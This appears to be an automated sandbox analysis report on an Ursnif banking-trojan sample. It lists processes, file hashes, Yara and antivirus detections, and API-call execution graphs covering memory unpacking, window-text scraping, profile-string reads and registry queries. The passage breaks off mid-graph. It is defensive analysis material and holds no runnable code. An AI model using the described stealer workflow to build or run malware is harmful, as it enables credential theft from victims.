                                                                                                                                      Reputation:moderate

                                                                                                                                      Chronological Activities

                                                                                                                                      Analysis Process: cmd.exe PID: 4256 Parent PID: 5128

                                                                                                                                      General

                                                                                                                                      Start time:11:20:37
                                                                                                                                      Start date:14/07/2020
                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:cmd /K
                                                                                                                                      Imagebase:0x110000
                                                                                                                                      File size:232960 bytes
                                                                                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high

                                                                                                                                      Chronological Activities

                                                                                                                                      Analysis Process: conhost.exe PID: 1632 Parent PID: 4256

                                                                                                                                      General

                                                                                                                                      Start time:11:20:37
                                                                                                                                      Start date:14/07/2020
                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      Imagebase:0x7ff7234f0000
                                                                                                                                      File size:625664 bytes
                                                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high

                                                                                                                                      Chronological Activities

                                                                                                                                      Analysis Process: WerFault.exe PID: 744 Parent PID: 4912

                                                                                                                                      General

                                                                                                                                      Start time:11:20:40
                                                                                                                                      Start date:14/07/2020
                                                                                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4912 -s 696
                                                                                                                                      Imagebase:0xcd0000
                                                                                                                                      File size:434584 bytes
                                                                                                                                      MD5 hash:80E91E3C0F5563E4049B62FCAF5D67AC
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high

                                                                                                                                      Chronological Activities

                                                                                                                                      Analysis Process: svchost.exe PID: 3708 Parent PID: 5128

                                                                                                                                      General

                                                                                                                                      Start time:11:20:44
                                                                                                                                      Start date:14/07/2020
                                                                                                                                      Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:C:\Windows\System32\svchost.exe
                                                                                                                                      Imagebase:0x30000
                                                                                                                                      File size:44520 bytes
                                                                                                                                      MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                      Reputation:moderate

                                                                                                                                      Chronological Activities

                                                                                                                                      Analysis Process: BN6D10.tmp PID: 1940 Parent PID: 5128

                                                                                                                                      General

                                                                                                                                      Start time:11:20:45
                                                                                                                                      Start date:14/07/2020
                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\BN6D10.tmp
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\BN6D10.tmp
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:145920 bytes
                                                                                                                                      MD5 hash:5105430437588F8878DA6957BC8C3119
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: Ursnif, Description: detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory, Source: 0000000D.00000003.549497164.0000000003868000.00000004.00000040.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000000D.00000003.549497164.0000000003868000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                      • Rule: Ursnif, Description: detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory, Source: 0000000D.00000002.711227479.0000000003868000.00000004.00000040.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                      • Rule: Ursnif, Description: detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory, Source: 0000000D.00000003.549218494.0000000003868000.00000004.00000040.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000000D.00000003.549218494.0000000003868000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                      • Rule: Ursnif, Description: detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory, Source: 0000000D.00000003.549333620.0000000003868000.00000004.00000040.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000000D.00000003.549333620.0000000003868000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                      • Rule: Ursnif, Description: detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory, Source: 0000000D.00000003.549457976.0000000003868000.00000004.00000040.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000000D.00000003.549457976.0000000003868000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                      • Rule: Ursnif, Description: detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory, Source: 0000000D.00000003.549162557.0000000003868000.00000004.00000040.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000000D.00000003.549162557.0000000003868000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                      • Rule: Ursnif, Description: detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory, Source: 0000000D.00000003.549367546.0000000003868000.00000004.00000040.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000000D.00000003.549367546.0000000003868000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                      • Rule: Ursnif, Description: detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory, Source: 0000000D.00000002.705232412.0000000000EF1000.00000020.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                      • Rule: Ursnif, Description: detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory, Source: 0000000D.00000003.549299177.0000000003868000.00000004.00000040.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000000D.00000003.549299177.0000000003868000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                      • Rule: Ursnif, Description: detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory, Source: 0000000D.00000003.549421669.0000000003868000.00000004.00000040.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000000D.00000003.549421669.0000000003868000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                      Antivirus matches:
                                                                                                                                      • Detection: 100%, Avira
                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                      • Detection: 42%, Virustotal, Browse
                                                                                                                                      • Detection: 14%, Metadefender, Browse
                                                                                                                                      • Detection: 55%, ReversingLabs
                                                                                                                                      Reputation:low

                                                                                                                                      Chronological Activities

                                                                                                                                      Analysis Process: iexplore.exe PID: 5712 Parent PID: 732

                                                                                                                                      General

                                                                                                                                      Start time:11:21:14
                                                                                                                                      Start date:14/07/2020
                                                                                                                                      Path:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
                                                                                                                                      Imagebase:0x7ff752040000
                                                                                                                                      File size:823560 bytes
                                                                                                                                      MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high

                                                                                                                                      Chronological Activities

                                                                                                                                      Analysis Process: iexplore.exe PID: 5356 Parent PID: 5712

                                                                                                                                      General

                                                                                                                                      Start time:11:21:18
                                                                                                                                      Start date:14/07/2020
                                                                                                                                      Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5712 CREDAT:17410 /prefetch:2
                                                                                                                                      Imagebase:0xc50000
                                                                                                                                      File size:822536 bytes
                                                                                                                                      MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high

                                                                                                                                      Chronological Activities

                                                                                                                                      Analysis Process: iexplore.exe PID: 5752 Parent PID: 732

                                                                                                                                      General

                                                                                                                                      Start time:11:22:03
                                                                                                                                      Start date:14/07/2020
                                                                                                                                      Path:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
                                                                                                                                      Imagebase:0x7ff752040000
                                                                                                                                      File size:823560 bytes
                                                                                                                                      MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high

                                                                                                                                      Chronological Activities

                                                                                                                                      Analysis Process: iexplore.exe PID: 5616 Parent PID: 5752

                                                                                                                                      General

                                                                                                                                      Start time:11:22:04
                                                                                                                                      Start date:14/07/2020
                                                                                                                                      Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5752 CREDAT:17410 /prefetch:2
                                                                                                                                      Imagebase:0xc50000
                                                                                                                                      File size:822536 bytes
                                                                                                                                      MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high

                                                                                                                                      Chronological Activities

                                                                                                                                      Disassembly

                                                                                                                                      Code Analysis

                                                                                                                                      Reset < >

                                                                                                                                        Analysis Process: regsvr32.exe PID: 4912 Parent PID: 5920 regsvr32.exeCOMMON

                                                                                                                                        Execution Graph

                                                                                                                                        Execution Coverage:10.5%
                                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                                        Signature Coverage:23.1%
                                                                                                                                        Total number of Nodes:13
                                                                                                                                        Total number of Limit Nodes:1

                                                                                                                                        Graph

                                                                                                                                        execution_graph 917 46b85c0 918 46b85e3 917->918 923 46b7c00 918->923 920 46b86cf 926 46b8120 VirtualProtect 920->926 924 46b7c41 923->924 925 46b7c74 VirtualAlloc 924->925 925->920 927 46b816c 926->927 928 46b83bd 927->928 929 46b838f VirtualProtect 927->929 929->927 930 46b7d20 931 46b7c00 VirtualAlloc 930->931 932 46b7d2d 931->932

                                                                                                                                        Executed Functions

                                                                                                                                        Function 046B7C00, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46memoryCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,?), ref: 046B7C84
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.481903605.00000000046B0000.00000040.00000001.sdmp, Offset: 046B0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_46b0000_regsvr32.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                        • String ID: VirtualAlloc
                                                                                                                                        • API String ID: 4275171209-164498762
                                                                                                                                        • Opcode ID: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
                                                                                                                                        • Instruction ID: feb1bc8488f71dbfea399997e137ecf55dd54227e97d794fe7686e6663d2a0b2
                                                                                                                                        • Opcode Fuzzy Hash: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
                                                                                                                                        • Instruction Fuzzy Hash: 4411D060D08289EEFF01D7E894097EEBFB55B11709F044098D6846A282D6BA5758C7E6
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.19%

                                                                                                                                        Function 046B8120, Relevance: 3.2, APIs: 2, Instructions: 236memoryCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • VirtualProtect.KERNELBASE(?,?,?,?), ref: 046B8166
                                                                                                                                        • VirtualProtect.KERNELBASE(?,?,00000000), ref: 046B83B0
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.481903605.00000000046B0000.00000040.00000001.sdmp, Offset: 046B0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_46b0000_regsvr32.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ProtectVirtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 544645111-0
                                                                                                                                        • Opcode ID: 6a4e5aa6d90b8b3ed13825a8e48c3be58f940a9f27a0826dba1cadd81984fabe
                                                                                                                                        • Instruction ID: 40edd7147cc87fc2ecacd0ef3eb445f14ae59efb430cb21fd8acc92a2965f0a2
                                                                                                                                        • Opcode Fuzzy Hash: 6a4e5aa6d90b8b3ed13825a8e48c3be58f940a9f27a0826dba1cadd81984fabe
                                                                                                                                        • Instruction Fuzzy Hash: 6EB188B5A00209DFCB08DF88C891EAEBBB5BF88314F148559E9499B355D731F982CBD4
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.02%

                                                                                                                                        Non-executed Functions

                                                                                                                                        Function 046B01D9, Relevance: .1, Instructions: 59COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.481903605.00000000046B0000.00000040.00000001.sdmp, Offset: 046B0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_46b0000_regsvr32.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 90c0b716c6baafa9d66677ac3545438cea8421ebec01131d137ea710dda224c3
                                                                                                                                        • Instruction ID: 001473ac52fd3d8a69fe8befedc7c7f5f12ea0893e4bca2d553c50233ae25243
                                                                                                                                        • Opcode Fuzzy Hash: 90c0b716c6baafa9d66677ac3545438cea8421ebec01131d137ea710dda224c3
                                                                                                                                        • Instruction Fuzzy Hash: CC115EA240A6C24FE307EB38C8A75837FE0AE1723431E1BCAC4955F4A3D518A51ACB06
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.00%

                                                                                                                                        Analysis Process: svchost.exe PID: 5128 Parent PID: 4912 svchost.exeUNIQUE

                                                                                                                                        Execution Graph

                                                                                                                                        Execution Coverage:36.3%
                                                                                                                                        Dynamic/Decrypted Code Coverage:87.2%
                                                                                                                                        Signature Coverage:16.9%
                                                                                                                                        Total number of Nodes:2000
                                                                                                                                        Total number of Limit Nodes:36

                                                                                                                                        Graph

                                                                                                                                        execution_graph 6720 1000b242 6721 1000b24c 6720->6721 6724 1000b260 6721->6724 6738 1000178e GetHGlobalFromStream 6721->6738 6723 1000b278 6723->6724 6752 1000162e GetHGlobalFromStream 6723->6752 6726 1000b286 6726->6724 6758 10001694 GetHGlobalFromStream 6726->6758 6728 1000b294 6728->6724 6766 100019e0 GetHGlobalFromStream 6728->6766 6730 1000b2a7 6730->6724 6731 1000162e 3 API calls 6730->6731 6732 1000b2b5 6731->6732 6732->6724 6733 10001694 3 API calls 6732->6733 6734 1000b2c3 6733->6734 6734->6724 6735 1000b2c9 6734->6735 6776 10001aa5 GetTickCount GetHGlobalFromStream 6735->6776 6737 1000b2d1 6737->6724 6739 100017ab 6738->6739 6740 10001862 6738->6740 6741 100017b3 GlobalLock 6739->6741 6740->6723 6741->6740 6742 100017c6 6741->6742 6786 10001888 LocalAlloc 6742->6786 6744 100017df 6787 10001888 LocalAlloc 6744->6787 6746 100017f8 6747 1000180e GlobalUnlock 6746->6747 6748 10001824 6747->6748 6788 10001871 6748->6788 6751 10001871 LocalFree 6751->6740 6753 1000164b 6752->6753 6756 10001678 6752->6756 6754 10001653 GlobalLock 6753->6754 6755 10001662 6754->6755 6754->6756 6757 1000166d GlobalUnlock 6755->6757 6756->6726 6757->6756 6759 100016b1 6758->6759 6760 100016fe 6758->6760 6761 100016c2 GlobalLock 6759->6761 6762 100016ee 6759->6762 6760->6728 6763 100016d2 6761->6763 6765 100016ec 6761->6765 6762->6728 6764 100016dd GlobalUnlock 6763->6764 6764->6765 6765->6728 6767 10001a00 6766->6767 6768 10001a96 6766->6768 6769 10001a08 GlobalLock 6767->6769 6768->6730 6769->6768 6770 10001a17 6769->6770 6791 10001888 LocalAlloc 6770->6791 6772 10001a22 6773 10001a33 GlobalUnlock lstrlenA 6772->6773 6774 10001a53 6773->6774 6775 10001871 LocalFree 6774->6775 6775->6768 6777 10001ad5 6776->6777 6778 10001b6a 6776->6778 6779 10001add GlobalLock 6777->6779 6778->6737 6779->6778 6780 10001aec 6779->6780 6792 10001888 LocalAlloc 6780->6792 6782 10001af7 6783 10001b08 GlobalUnlock 6782->6783 6784 10001b25 6783->6784 6785 10001871 LocalFree 6784->6785 6785->6778 6786->6744 6787->6746 6789 1000185a 6788->6789 6790 1000187a LocalFree 6788->6790 6789->6751 6790->6789 6791->6772 6792->6782 7415 1000124c CreateFileA 7416 10001269 7415->7416 7417 1000126d ReadFile 7415->7417 7418 10001299 7417->7418 7419 1000128b CloseHandle 7417->7419 7418->7417 7420 100012b1 CloseHandle 7418->7420 7421 1000b18e 7422 1000b196 7421->7422 7425 10009f63 7422->7425 7424 1000b1bc 7426 10009f7a 7425->7426 7427 10009f7c GetPEB 7425->7427 7426->7424 7430 10009f9e 7427->7430 7428 1000a06c 7428->7424 7430->7428 7456 100023c5 7430->7456 7460 100044f3 7430->7460 7486 10005cb2 7430->7486 7498 1000ae2d 7430->7498 7510 100098e8 7430->7510 7514 100099a4 7430->7514 7554 1000a2e3 7430->7554 7558 1000781f 7430->7558 7573 10006a1e 7430->7573 7608 10004c5c 7430->7608 7636 1000a65a 7430->7636 7642 10005f99 7430->7642 7648 1000a319 7430->7648 7652 10009919 7430->7652 7664 1000acd9 7430->7664 7694 10005858 7430->7694 7732 10007798 7430->7732 7740 100059d7 7430->7740 7748 100078d5 7430->7748 7756 10004fd4 7430->7756 7785 10009f0e 7430->7785 7795 1000484d 7430->7795 7867 1000520b 7430->7867 7907 10005705 7430->7907 7941 10008342 7430->7941 7951 10005c81 7430->7951 7457 100023ce 7456->7457 7458 100023da 7457->7458 7459 10001871 LocalFree 7457->7459 7458->7430 7459->7457 7461 1000450a 7460->7461 7462 1000452b GetVersionExA 7461->7462 7463 1000454d 7462->7463 7955 10002e8d GetModuleHandleA 7463->7955 7465 10004593 7961 10001888 LocalAlloc 7465->7961 7467 100045a6 GetLocaleInfoA 7962 10001558 7467->7962 7469 100045d5 GetLocaleInfoA 7470 100045fe 7469->7470 7964 10002ef5 7470->7964 7472 10004603 7972 10004462 7472->7972 7476 10001871 LocalFree 7477 1000468d 7476->7477 7479 10001871 LocalFree 7477->7479 7478 10004622 7478->7476 7480 10004698 GetModuleHandleA 7479->7480 7481 100046d1 7480->7481 7482 100046b3 GetProcAddress 7480->7482 7484 100046d5 GetSystemInfo 7481->7484 7485 100046e1 7481->7485 7482->7481 7483 100046c7 GetNativeSystemInfo 7482->7483 7483->7481 7484->7485 7485->7430 7487 10005cc4 7486->7487 8022 10004394 7487->8022 7490 10001d2a 6 API calls 7491 10005cfc 7490->7491 7492 10001e05 6 API calls 7491->7492 7493 10005d24 7491->7493 7494 10005d0b 7492->7494 7493->7430 8029 10004349 7494->8029 7497 10001871 LocalFree 7497->7493 8283 100015a9 7498->8283 7500 1000ae42 GetCurrentDirectoryA 8285 10007690 StrStrIA 7500->8285 7503 10007690 85 API calls 7504 1000ae99 SetCurrentDirectoryA GetCurrentDirectoryA 7503->7504 7505 10007690 85 API calls 7504->7505 7506 1000aedd 7505->7506 7507 10007690 85 API calls 7506->7507 7508 1000aef9 SetCurrentDirectoryA 7507->7508 7509 1000af10 7508->7509 7509->7430 7511 100098fa 7510->7511 8549 100094e1 7511->8549 7513 1000990a 7513->7430 7515 100099b9 7514->7515 8574 10001888 LocalAlloc 7515->8574 7517 100099c3 8575 10001888 LocalAlloc 7517->8575 7519 100099cd 8576 10001888 LocalAlloc 7519->8576 7521 100099d7 FindWindowExA 7522 100099f2 FindWindowExA 7521->7522 7523 10009b75 7521->7523 7522->7523 7524 10009a1d FindWindowExA 7522->7524 7529 10001871 LocalFree 7523->7529 7525 10009a36 SendMessageA FindWindowExA 7524->7525 7526 10009a9f FindWindowExA 7524->7526 7527 10009a9a 7525->7527 7528 10009a5e SendMessageA 7525->7528 7530 10009ac8 7526->7530 7527->7523 7528->7527 7532 10009a74 7528->7532 7533 10009b88 7529->7533 7530->7523 7531 10009ab2 GetClassNameA 7530->7531 7535 10009b5e FindWindowExA 7530->7535 7539 10009ae4 SendMessageW 7530->7539 7531->7530 7531->7535 7537 10001584 lstrlenA 7532->7537 7534 10001871 LocalFree 7533->7534 7536 10009b90 7534->7536 7535->7530 7538 10001871 LocalFree 7536->7538 7540 10009a8f 7537->7540 7541 10009b98 7538->7541 8577 10002a83 7539->8577 7543 10001584 lstrlenA 7540->7543 7541->7430 7543->7527 7545 10001871 LocalFree 7546 10009b04 FindWindowExA SendMessageW 7545->7546 7547 10002a83 4 API calls 7546->7547 7548 10009b2c 7547->7548 7549 10001871 LocalFree 7548->7549 7550 10009b35 7549->7550 7551 10001584 lstrlenA 7550->7551 7552 10009b51 7551->7552 7553 10001584 lstrlenA 7552->7553 7553->7527 7555 1000a2f5 7554->7555 8591 1000a2a5 7555->8591 7557 1000a30a 7557->7430 7559 10007834 7558->7559 7560 10001e6a 7 API calls 7559->7560 7561 1000783e 7560->7561 7562 10007866 GetCurrentDirectoryA 7561->7562 7563 10001e05 6 API calls 7561->7563 7564 10007690 85 API calls 7562->7564 7565 1000784d 7563->7565 7566 1000789e 7564->7566 7567 10004349 34 API calls 7565->7567 7568 10007690 85 API calls 7566->7568 7569 10007861 7567->7569 7570 100078ba SetCurrentDirectoryA 7568->7570 7571 10001871 LocalFree 7569->7571 7572 100078d1 7570->7572 7571->7562 7572->7430 7574 10006a30 7573->7574 8614 100069fc 7574->8614 7577 100069fc 49 API calls 7578 10006a47 7577->7578 7579 100069fc 49 API calls 7578->7579 7580 10006a51 7579->7580 7581 10001d2a 6 API calls 7580->7581 7582 10006a68 7581->7582 7583 10006a80 7582->7583 7584 10006a6c 7582->7584 7586 10001d2a 6 API calls 7583->7586 8621 1000673c 7584->8621 7588 10006a97 7586->7588 7590 10006a9b 7588->7590 7591 10006aaf 7588->7591 7589 10001871 LocalFree 7589->7583 7592 1000673c 38 API calls 7590->7592 7593 10001d2a 6 API calls 7591->7593 7595 10006aaa 7592->7595 7594 10006ac2 7593->7594 7596 10006aea 7594->7596 7598 100023e6 9 API calls 7594->7598 7597 10001871 LocalFree 7595->7597 7599 1000945c 39 API calls 7596->7599 7597->7591 7600 10006acd 7598->7600 7601 10006afc 7599->7601 7602 10006ad1 7600->7602 7603 10006ae5 7600->7603 7601->7430 7604 1000673c 38 API calls 7602->7604 7605 10001871 LocalFree 7603->7605 7606 10006ae0 7604->7606 7605->7596 7607 10001871 LocalFree 7606->7607 7607->7603 7609 100015a9 7608->7609 7610 10004c71 GetWindowsDirectoryA 7609->7610 7611 10004d30 7610->7611 7612 10004c8d 7610->7612 7613 10001e6a 7 API calls 7611->7613 7612->7611 7615 10001db1 5 API calls 7612->7615 7614 10004d37 7613->7614 7616 10004d57 7614->7616 7618 10001e05 6 API calls 7614->7618 7617 10004ca9 GetPrivateProfileStringA 7615->7617 8782 10004c10 7616->8782 7619 10004cd9 7617->7619 7620 10004cea GetPrivateProfileStringA 7617->7620 7622 10004d46 7618->7622 7623 10004a84 31 API calls 7619->7623 7625 10004d14 7620->7625 7626 10004d25 7620->7626 8754 10004a84 7622->8754 7623->7620 7629 10004a84 31 API calls 7625->7629 7630 10001871 LocalFree 7626->7630 7628 10004c10 36 API calls 7632 10004d75 7628->7632 7629->7626 7630->7611 7634 10004c10 36 API calls 7632->7634 7633 10001871 LocalFree 7633->7616 7635 10004d84 7634->7635 7635->7430 7637 1000a66c 7636->7637 8796 1000a34f RegOpenKeyA 7637->8796 7640 1000a34f 18 API calls 7641 1000a6b0 7640->7641 7641->7430 7643 10005fab 7642->7643 8808 10005d33 RegOpenKeyA 7643->8808 7646 10005d33 14 API calls 7647 10005fd3 7646->7647 7647->7430 7649 1000a32b 7648->7649 7650 1000a2a5 39 API calls 7649->7650 7651 1000a340 7650->7651 7651->7430 7653 1000992b 7652->7653 7654 100094e1 39 API calls 7653->7654 7655 1000993b 7654->7655 7656 10001d2a 6 API calls 7655->7656 7657 10009952 7656->7657 7658 10009995 7657->7658 7659 1000419e 34 API calls 7657->7659 7658->7430 7660 10009973 7659->7660 7661 1000419e 34 API calls 7660->7661 7662 1000998d 7661->7662 7663 10001871 LocalFree 7662->7663 7663->7658 7669 1000aceb 7664->7669 8819 1000ac87 7669->8819 7670 10001db1 5 API calls 7671 1000ad55 7670->7671 8833 1000a942 RegOpenKeyA 7671->8833 7674 10001871 LocalFree 7675 1000ad71 7674->7675 7676 10001d2a 6 API calls 7675->7676 7677 1000ad87 7676->7677 7678 1000adad 7677->7678 7680 10001e05 6 API calls 7677->7680 7679 1000a89e 23 API calls 7678->7679 7681 1000adc2 7679->7681 7682 1000ad96 7680->7682 7684 1000a942 26 API calls 7681->7684 7683 1000a89e 23 API calls 7682->7683 7685 1000ada8 7683->7685 7686 1000add9 7684->7686 7687 10001871 LocalFree 7685->7687 7688 1000a942 26 API calls 7686->7688 7687->7678 7689 1000adf0 7688->7689 7690 1000a942 26 API calls 7689->7690 7691 1000ae07 7690->7691 7692 1000a942 26 API calls 7691->7692 7693 1000ae1e 7692->7693 7693->7430 7695 1000586a 7694->7695 7696 10001d2a 6 API calls 7695->7696 7697 10005884 7696->7697 7698 1000589c 7697->7698 7699 10004064 16 API calls 7697->7699 7700 10001d2a 6 API calls 7698->7700 7701 10005897 7699->7701 7702 100058b3 7700->7702 7703 10001871 LocalFree 7701->7703 7704 100058cb 7702->7704 7705 10004064 16 API calls 7702->7705 7703->7698 7706 10001d2a 6 API calls 7704->7706 7707 100058c6 7705->7707 7708 100058e2 7706->7708 7709 10001871 LocalFree 7707->7709 7710 100058f5 7708->7710 8909 100057fa 7708->8909 7709->7704 7712 10001d2a 6 API calls 7710->7712 7714 1000590c 7712->7714 7716 1000591f 7714->7716 7718 100057fa 34 API calls 7714->7718 7715 10001871 LocalFree 7715->7710 7717 10001d2a 6 API calls 7716->7717 7719 10005936 7717->7719 7720 1000591a 7718->7720 7722 10005949 7719->7722 7723 100057fa 34 API calls 7719->7723 7721 10001871 LocalFree 7720->7721 7721->7716 8900 1000582b 7722->8900 7725 10005944 7723->7725 7727 10001871 LocalFree 7725->7727 7727->7722 7728 1000582b 39 API calls 7729 1000595d 7728->7729 7730 1000582b 39 API calls 7729->7730 7731 10005967 7730->7731 7731->7430 7733 100015a9 7732->7733 7734 100077ad GetCurrentDirectoryA 7733->7734 7735 10007690 85 API calls 7734->7735 7736 100077e8 7735->7736 7737 10007690 85 API calls 7736->7737 7738 10007804 SetCurrentDirectoryA 7737->7738 7739 1000781b 7738->7739 7739->7430 7741 100059e9 7740->7741 8914 10005976 7741->8914 7744 10005976 39 API calls 7745 10005a07 7744->7745 7746 10005976 39 API calls 7745->7746 7747 10005a11 7746->7747 7747->7430 7749 100015a9 7748->7749 7750 100078ea GetCurrentDirectoryA 7749->7750 7751 10007690 85 API calls 7750->7751 7752 10007925 7751->7752 7753 10007690 85 API calls 7752->7753 7754 10007941 SetCurrentDirectoryA 7753->7754 7755 10007958 7754->7755 7755->7430 7759 10004fe7 7756->7759 7757 10005030 8927 10004f2b 7757->8927 7758 10004ff5 StrStrIA 7758->7759 7759->7757 7759->7758 7761 100023e6 9 API calls 7759->7761 7769 10001871 LocalFree 7759->7769 8961 10004df4 7759->8961 7761->7759 7763 10004f2b 34 API calls 7764 10005044 7763->7764 7766 10004f2b 34 API calls 7764->7766 7767 1000504e 7766->7767 7768 10004f2b 34 API calls 7767->7768 7770 10005058 7768->7770 7769->7759 8956 10004daa 7770->8956 7773 10004daa 6 API calls 7774 10005072 7773->7774 7775 10004daa 6 API calls 7774->7775 7776 1000507f 7775->7776 7777 10004daa 6 API calls 7776->7777 7778 1000508c 7777->7778 7779 10004daa 6 API calls 7778->7779 7780 10005099 7779->7780 7781 10004daa 6 API calls 7780->7781 7782 100050a6 7781->7782 7783 10004daa 6 API calls 7782->7783 7784 100050b3 7783->7784 7784->7430 7786 10009f20 7785->7786 8988 10009c4d 7786->8988 7789 